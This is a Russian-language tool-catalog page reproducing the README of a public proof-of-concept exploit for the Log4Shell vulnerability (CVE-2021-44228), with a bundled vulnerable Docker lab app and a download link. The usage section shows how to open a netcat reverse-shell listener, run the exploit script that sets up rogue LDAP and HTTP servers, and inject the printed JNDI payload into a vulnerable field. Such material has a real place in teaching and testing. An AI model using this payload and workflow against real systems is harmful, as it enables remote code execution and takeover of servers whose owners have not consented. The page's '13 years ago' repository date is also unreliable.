Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4j-shell-poc — Proof-of-Concept для уязвимости CVE-2021-44228. | Kitploit
Инструменты/GitHubGitHub/ocastel/log4j-shell-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubocastel/log4j-shell-poc

log4j-shell-poc

Proof-of-Concept для уязвимости CVE-2021-44228.

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

log4j-shell-poc

Proof-of-Concept для недавно обнаруженной уязвимости CVE-2021-44228.

Недавно в log4j — библиотеке журналирования на Java, которая очень широко используется в таких проектах, как elasticsearch, minecraft и многих других, — была обнаружена новая уязвимость.

В этом репозитории мы создали пример уязвимого приложения и эксплойт Proof-of-Concept (POC) для него.

Видео, демонстрирующее процесс эксплуатации

Уязвимое веб-приложение:

https://user-images.githubusercontent.com/87979263/146113359-20663eaa-555d-4d60-828d-a7f769ebd266.mp4


Ghidra (старый скрипт):

https://user-images.githubusercontent.com/87979263/145728478-b4686da9-17d0-4511-be74-c6e6fff97740.mp4


Minecraft PoC (старый скрипт):

https://user-images.githubusercontent.com/87979263/145681727-2bfd9884-a3e6-45dd-92e2-a624f29a8863.mp4

Proof-of-Concept (POC)

В качестве PoC мы создали python-файл, который автоматизирует этот процесс.

Требования:

root@kitploit:~
pip install -r requirements.txt

Использование:

  • Запустите netcat-слушатель для приёма обратного соединения (reverse shell).
root@kitploit:~
nc -lvnp 9001
  • Запустите эксплойт.
    Примечание: Для корректной работы извлечённый java-архив должен называться jdk1.8.0_20 и находиться в том же каталоге.
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

Этот скрипт сам поднимет HTTP-сервер и LDAP-сервер, а также создаст полезную нагрузку (payload), которую вы сможете вставить в уязвимый параметр. После этого, если всё прошло успешно, вы должны получить шелл на указанном порту (lport).


Наше уязвимое приложение

Мы добавили Dockerfile с уязвимым веб-приложением. Вы можете использовать его, выполнив следующие шаги:

root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc

После запуска оно будет доступно по адресу localhost:8080

Если вы хотите продолжить разработку проекта, можете использовать Intellij IDEA — именно эту IDE мы использовали для разработки. Мы также включили папку .idea с файлами конфигурации, которые немного упрощают работу. Вероятно, вы сможете использовать и другие IDE.


Получение нужной версии Java.

На момент создания эксплойта мы не были уверены, какие именно версии java работают, а какие нет, поэтому решили работать с одной из самых ранних версий java 8: java-8u20.

К счастью, Oracle предоставляет архив для всех предыдущих версий java:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
Прокрутите вниз до 8u20 и загрузите подходящие файлы для вашей операционной системы и оборудования. Screenshot from 2021-12-11 00-09-25

Примечание: Для загрузки пакета необходимо создать учётную запись.

После того как вы загрузите и извлечёте архив, вы найдёте java и несколько связанных бинарных файлов в jdk1.8.0_20/bin.
Примечание: Пожалуйста, убедитесь, что вы извлекли папку jdk в этот репозиторий с тем же именем, чтобы всё работало.

root@kitploit:~
❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

Отказ от ответственности

Этот репозиторий не предназначен для эксплуатации CVE-2021-44228 «в один клик». Цель проекта — помочь людям узнать об этой замечательной уязвимости и, возможно, протестировать свои собственные приложения (однако для этой цели существуют и более подходящие приложения, например: https://log4shell.tools/).

Наша команда не будет помогать или поддерживать любое использование этого эксплойта в злонамеренных целях; поэтому, если вы обратитесь за помощью, мы можем потребовать доказательства того, что вы либо владеете целевым сервисом, либо имеете разрешение на проведение пентеста.

Скачать инструмент